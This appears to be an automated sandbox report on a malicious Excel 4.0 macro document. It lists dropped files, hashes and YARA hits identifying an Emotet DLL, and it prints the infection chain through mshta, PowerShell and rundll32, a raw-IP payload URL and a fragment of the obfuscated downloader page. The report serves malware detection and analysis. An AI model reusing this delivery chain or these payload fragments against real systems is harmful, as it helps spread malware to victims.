                                                                                                                        SSDEEP:6:kKTXWk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:bXW9kPlE99SNxAhUeYlUSA/t
                                                                                                                        MD5:AB1C8979C81A5CB6BC431938BE60FB83
                                                                                                                        SHA1:6FDC39902F41B95BE31259D33E692F509EDE7336
                                                                                                                        SHA-256:5FB1211AF015014FF42C8BCF0847038AB35D81A4F600BC1A0B286022A2B34578
                                                                                                                        SHA-512:A8EACC963409BD8D058EACD8EE62A83D99A064332CFDDD060897DFF5E8CD6FB93FABA402B14350A65FF2CF3403EDA05D8A4DE1452AC8A829E4AD25AD7541F8DE
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ..........#.....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                        File Type:data
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):11101
                                                                                                                        Entropy (8bit):6.2008748618289005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:aYsCkQua+4prGY1KEI7HhGmx72lurMSwpHJhd519YxsZV29Zjyjtx7q0m3OWXKYn:aYJksvpr7+7HhGI2lurD+39r2/ji3uwK
                                                                                                                        MD5:23440BCB46916D8BE91E6EADECADC6FD
                                                                                                                        SHA1:3828BC25F5EEEE28119B0AA47E901BD95FD018D2
                                                                                                                        SHA-256:96DCD43ADCA49FE6DE55A1D3514F29462C06E52CA00F0A61098E26A17C33E5C3
                                                                                                                        SHA-512:E5B7CCF5B65AEFDA08045FAEDB359ABE667DD4C9BDC894BDD938FC72B44D0D2D1F210AFC0605A5D4176839C83A51AC95E563F518D4D062AB26BAEA56F74B66D2
                                                                                                                        Malicious:false
                                                                                                                        IE Cache URL:http://91.240.118.168/zzx/ccv/fe.html
                                                                                                                        Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';oA5T24jEdxmH8=new Array();uySMoq2S5sfDQ=new Array();uySMoq2S5sfDQ[0]='\164%33\103\146\153r%38\111' ;oA5T24jEdxmH8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.a}..2.%.2

                                                                                                                        C:\Users\user\AppData\Local\Temp\41B1.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1536
                                                                                                                        Entropy (8bit):1.1464700112623651
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                        MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                        SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                        SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                        SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                        Malicious:false
                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\CabB6BA.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61414
                                                                                                                        Entropy (8bit):7.995245868798237
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                        Malicious:false
                                                                                                                        Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                                        C:\Users\user\AppData\Local\Temp\TarB6BB.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:data
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):161595
                                                                                                                        Entropy (8bit):6.302448239972517
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                                                                                                        MD5:D99661D0893A52A0700B8AE68457351A
                                                                                                                        SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                                                                                                        SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                                                                                                        SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                                                                                                        Malicious:false
                                                                                                                        Preview:0..w6..*.H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF16174BE405C9953D.TMP

                                                                                                                        Download File
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):28672
                                                                                                                        Entropy (8bit):2.6640799752823963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:kAFN3+g+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cML:kI+Hymsbck3hbdlylKsgqopeJBWhZFGM
                                                                                                                        MD5:CEE3614693EB53F7293A3C223BC2FA4F
                                                                                                                        SHA1:B36D0659E465A68B397C241E7AB0E86E0AD398E7
                                                                                                                        SHA-256:B65D8C27161E97571ECF348B002A50D158C345F9DA3F4FE04FA26C27B2BE59F6
                                                                                                                        SHA-512:A3CF713245FEDF788EC3D584F9763C7FC619982CC60ED733AFFEAFC93F3C1E01C18171BC22F4A93FE50B34DA1A6163F99FB20F9B0842F121C2F458C23C5F8347
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF2B6564A12AAF7185.TMP

                                                                                                                        Download File
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):512
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3::
                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                        Malicious:false
                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8016
                                                                                                                        Entropy (8bit):3.5832040477947182
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:chQCcMq+qvsqvJCwo5z8hQCcMq+qvsEHyqvJCworfzIuYbHyUVhxlUV7A2:ciHo5z8irHnorfzIQUVh+A2
                                                                                                                        MD5:A97322B899F5E5AD0F8A0677D238B727
                                                                                                                        SHA1:1D1CDD4012A8DD2E17DF676D5F6F44E3CD568046
                                                                                                                        SHA-256:BF7B5438ABB29F5D8A22244836A9FAF1290B1613C7884AB2B651AFDB12BD2033
                                                                                                                        SHA-512:2F91F611AAFF01D9513AD11C9470D452C50BAD0D59B4446F48C54184D0FABAE20ED26CA197AEA2299D2DCDF3879B9046BFB89F9B874FCC301548D8E107AAA0E2
                                                                                                                        Malicious:false
                                                                                                                        Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RIN99RL6CKSGFKPXUGYI.temp

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8016
                                                                                                                        Entropy (8bit):3.5832040477947182
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:chQCcMq+qvsqvJCwo5z8hQCcMq+qvsEHyqvJCworfzIuYbHyUVhxlUV7A2:ciHo5z8irHnorfzIQUVh+A2
                                                                                                                        MD5:A97322B899F5E5AD0F8A0677D238B727
                                                                                                                        SHA1:1D1CDD4012A8DD2E17DF676D5F6F44E3CD568046
                                                                                                                        SHA-256:BF7B5438ABB29F5D8A22244836A9FAF1290B1613C7884AB2B651AFDB12BD2033
                                                                                                                        SHA-512:2F91F611AAFF01D9513AD11C9470D452C50BAD0D59B4446F48C54184D0FABAE20ED26CA197AEA2299D2DCDF3879B9046BFB89F9B874FCC301548D8E107AAA0E2
                                                                                                                        Malicious:false
                                                                                                                        Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                        C:\Users\user\Desktop\imedpub.com_10.xls

                                                                                                                        Download File
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 21:52:19 2022, Last Saved Time/Date: Wed Jan 26 22:16:39 2022, Security: 0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):77312
                                                                                                                        Entropy (8bit):5.806410009760576
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:qI+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+xT:qI+HymsYk3hbdlylKsgqopeJBWhZFGk9
                                                                                                                        MD5:C05FE165227BA97C15FDEDCD3FE48136
                                                                                                                        SHA1:1A3A980F0B488987E969F95327DA024233642711
                                                                                                                        SHA-256:1D8F16C35A59415204D1C9226327A50069981AB0FA633F4149B76D8BE30C6709
                                                                                                                        SHA-512:D11D3E6852C431A2504237517F0045BB9C58B1BFC01F6625B781F9D347998558E591B0CF9185567D466015E3BCCB6EB00AC1A032D52EFBEA6A4402EF9D52BB0B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: John Lambert @JohnLaTwC
                                                                                                                        • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: Joe Security
                                                                                                                        • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\imedpub.com_10.xls, Author: ditekSHen
                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.

                                                                                                                        C:\Users\Public\Documents\ssd.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.980507366834709
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:B2AavzUBPSczbeeTLjv8yMwWd3DYr6i64/:OUBPSczbeeTnvcZDWA
                                                                                                                        MD5:82A9CB505605589911CBC9284776BC8D
                                                                                                                        SHA1:A5418AF09BC7F2763494AAF001F98CA8EA058B07
                                                                                                                        SHA-256:7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                                                                                                                        SHA-512:7A8E9C04512E11A60A3CB20945B063AE22EAE0184D4EBA6A6B8E3FAC24D039EE00F7CC9E6BEBD8CF4887A0FC3B706560DB6303FD5ED118862B21255B802D59DE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\Users\Public\Documents\ssd.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: iMedPub LTD_10.xls, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.980507366834709
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:B2AavzUBPSczbeeTLjv8yMwWd3DYr6i64/:OUBPSczbeeTnvcZDWA
                                                                                                                        MD5:82A9CB505605589911CBC9284776BC8D
                                                                                                                        SHA1:A5418AF09BC7F2763494AAF001F98CA8EA058B07
                                                                                                                        SHA-256:7A4A00A0FD4DBF14780E1536313A65728FE875D3B05973043FE6A0F61DAADF4A
                                                                                                                        SHA-512:7A8E9C04512E11A60A3CB20945B063AE22EAE0184D4EBA6A6B8E3FAC24D039EE00F7CC9E6BEBD8CF4887A0FC3B706560DB6303FD5ED118862B21255B802D59DE
                                                                                                                        Malicious:false
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: iMedPub LTD_10.xls, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 21:52:19 2022, Last Saved Time/Date: Wed Jan 26 22:16:39 2022, Security: 0
                                                                                                                        Entropy (8bit):5.792905808562405
                                                                                                                        TrID:
                                                                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                        File name:imedpub.com_10.xls
                                                                                                                        File size:77550
                                                                                                                        MD5:b7d1edc6031adb3dfb8b7a4489da9102
                                                                                                                        SHA1:fbb0c3649b1741de48c037cea19f088acad5c6a6
                                                                                                                        SHA256:6a9dd96ee5aeaedd9045f2bd76b3bd8d7f7b42cc37c46ad076791e33b1bb2fdc
                                                                                                                        SHA512:f1d2a2929f14730ca4ab19f289e33e5a196c8c4085348ea298b4b7f46589a4c18ef043edc76ad7bb344d210af954c7db9e329729f901c207262ab278c0ef5416
                                                                                                                        SSDEEP:1536:1I+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+x:1I+HymsYk3hbdlylKsgqopeJBWhZFGkz
                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                                                                        Static OLE Info

                                                                                                                        General

                                                                                                                        Document Type:OLE
                                                                                                                        Number of OLE Files:1

                                                                                                                        OLE File "imedpub.com_10.xls"

                                                                                                                        Indicators
                                                                                                                        Has Summary Info:True
                                                                                                                        Application Name:Microsoft Excel
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:False
                                                                                                                        Contains Workbook/Book Stream:True
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:
                                                                                                                        Flash Objects Count:
                                                                                                                        Contains VBA Macros:True
                                                                                                                        Summary
                                                                                                                        Code Page:1251
                                                                                                                        Author:xXx
                                                                                                                        Last Saved By:xXx
                                                                                                                        Create Time:2022-01-26 21:52:19
                                                                                                                        Last Saved Time:2022-01-26 22:16:39
                                                                                                                        Creating Application:Microsoft Excel
                                                                                                                        Security:0
                                                                                                                        Document Summary
                                                                                                                        Document Code Page:1251
                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                        Company:
                                                                                                                        Contains Dirty Links:False
                                                                                                                        Shared Document:False
                                                                                                                        Changed Hyperlinks:False
                                                                                                                        Application Version:1048576

                                                                                                                        Streams

                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.347239233907
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b8 00 00 00
                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.2647047667
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . i . . . . . @ . . . . = . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 66634
                                                                                                                        General
                                                                                                                        Stream Path:Workbook
                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                        Stream Size:66634
                                                                                                                        Entropy:6.37226949829
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                        Macro 4.0 Code

                                                                                                                        Name:Macro1
                                                                                                                        Type:3
                                                                                                                        Final:False
                                                                                                                        Visible:False
                                                                                                                        Protected:False
